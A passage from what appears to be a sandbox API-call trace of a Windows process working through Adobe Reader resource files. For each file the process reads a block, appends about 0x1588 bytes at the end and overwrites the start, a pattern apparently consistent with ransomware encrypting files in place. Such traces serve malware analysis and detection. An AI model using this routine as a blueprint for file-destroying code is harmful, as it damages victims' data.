| out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6416 [0088.264] ReadFile (in: hFile=0x1f8, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.426] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6416 [0088.426] WriteFile (in: hFile=0x1f8, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0088.426] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0088.430] WriteFile (in: hFile=0x1f8, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0088.431] CloseHandle (hObject=0x1f8) returned 1 [0088.431] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.tr.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0089.080] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0089.080] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x7288 [0089.080] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0089.080] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0089.080] ReleaseMutex (hMutex=0x168) returned 1 [0089.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.tr.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0089.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.tr.txt", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.tr.txt", lpUsedDefaultChar=0x0) returned 27 [0089.080] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0089.107] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6288 [0089.107] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0089.203] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6288 [0089.203] WriteFile (in: hFile=0x1d4, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0089.203] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0089.203] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0089.203] CloseHandle (hObject=0x1d4) returned 1 [0089.204] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ara32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ara32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0090.206] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0090.206] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x7ff4 [0090.206] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0090.206] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.206] ReleaseMutex (hMutex=0x168) returned 1 [0090.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ara32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0090.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ara32.clx", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ara32.clx", lpUsedDefaultChar=0x0) returned 9 [0090.206] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.212] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6ff4 [0090.212] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.299] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6ff4 [0090.299] WriteFile (in: hFile=0x1f0, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0090.300] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0090.300] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0090.300] CloseHandle (hObject=0x1f0) returned 1 [0090.300] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0090.422] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0090.422] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x800 [0090.422] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0090.422] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.422] ReleaseMutex (hMutex=0x168) returned 1 [0090.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brz.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0090.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brz.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="brz.hyp", lpUsedDefaultChar=0x0) returned 7 [0090.422] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x2b1f2bc*=0x800, lpOverlapped=0x0) returned 1 [0090.424] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0090.424] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea98e8*, nNumberOfBytesToWrite=0xd88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea98e8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xd88, lpOverlapped=0x0) returned 1 [0090.424] CloseHandle (hObject=0x1f0) returned 1 [0090.424] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0090.529] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0090.529] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1a400 [0090.529] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0090.529] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.529] ReleaseMutex (hMutex=0x168) returned 1 [0090.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="can.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0090.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="can.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="can.hyp", lpUsedDefaultChar=0x0) returned 7 [0090.529] ReadFile (in: hFile=0x1f0, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0090.612] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x19400 [0090.613] ReadFile (in: hFile=0x1f0, lpBuffer=0x2866a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.742] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x19400 [0090.742] WriteFile (in: hFile=0x1f0, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0090.742] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0090.742] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0090.742] CloseHandle (hObject=0x1f0) returned 1 [0090.775] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr95.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr95.ths"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0090.936] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0090.936] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4c800 [0090.936] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0090.936] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.936] ReleaseMutex (hMutex=0x168) returned 1 [0090.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cfr95.ths", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0090.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cfr95.ths", cchWideChar=9, lpMultiByteStr=0x1f735ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cfr95.ths", lpUsedDefaultChar=0x0) returned 9 [0090.936] ReadFile (in: hFile=0x1f0, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0092.256] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4b800 [0092.256] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea98e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea98e8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.358] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4b800 [0092.360] WriteFile (in: hFile=0x1f0, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.360] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0092.360] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0092.360] CloseHandle (hObject=0x1f0) returned 1 [0092.361] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0092.361] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0092.362] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x7fd1 [0092.362] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0092.362] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.362] ReleaseMutex (hMutex=0x168) returned 1 [0092.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cze32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cze32.clx", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cze32.clx", lpUsedDefaultChar=0x0) returned 9 [0092.362] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.415] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6fd1 [0092.417] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.430] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6fd1 [0092.430] WriteFile (in: hFile=0x1f0, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.431] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0092.431] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0092.431] CloseHandle (hObject=0x1f0) returned 1 [0092.436] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut102.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut102.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0092.437] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0092.437] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x5c06a [0092.438] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0092.438] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.438] ReleaseMutex (hMutex=0x168) returned 1 [0092.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dut102.hsp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dut102.hsp", cchWideChar=10, lpMultiByteStr=0x1f7356c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dut102.hsp", lpUsedDefaultChar=0x0) returned 10 [0092.438] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0092.450] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5b06a [0092.450] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.456] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5b06a [0092.457] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea88b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea88b8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.457] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0092.457] WriteFile (in: hFile=0x1f0, lpBuffer=0x289f978*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0092.457] CloseHandle (hObject=0x1f0) returned 1 [0092.458] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0092.462] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0092.462] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x7fec [0092.462] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0092.462] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.462] ReleaseMutex (hMutex=0x168) returned 1 [0092.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="est32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="est32.clx", 